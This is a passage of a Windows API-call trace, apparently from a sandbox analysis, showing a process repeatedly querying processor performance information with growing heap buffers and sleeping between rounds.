[0197.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.957] Sleep (dwMilliseconds=0x110) [0198.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.006] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.007] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.007] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.008] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.008] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.008] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.008] Sleep (dwMilliseconds=0x110) [0198.055] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.055] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.056] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.056] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.056] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.057] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.063] Sleep (dwMilliseconds=0x110) [0198.075] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.075] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.076] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.082] Sleep (dwMilliseconds=0x110) [0198.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.099] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.099] Sleep (dwMilliseconds=0x110) [0198.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.114] Sleep (dwMilliseconds=0x110) [0198.122] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.122] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.122] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.122] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.122] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.125] Sleep (dwMilliseconds=0x110) [0198.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.145] Sleep (dwMilliseconds=0x110) [0198.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.161] Sleep (dwMilliseconds=0x110) [0198.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.177] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.177] Sleep (dwMilliseconds=0x110) [0198.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.193] Sleep (dwMilliseconds=0x110) [0198.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.208] Sleep (dwMilliseconds=0x110) [0198.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.223] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.223] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.224] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.224] Sleep (dwMilliseconds=0x110) [0198.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.239] Sleep (dwMilliseconds=0x110) [0198.255] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.255] NtQuerySystemInformation (in: SystemInformationClass=0x8, 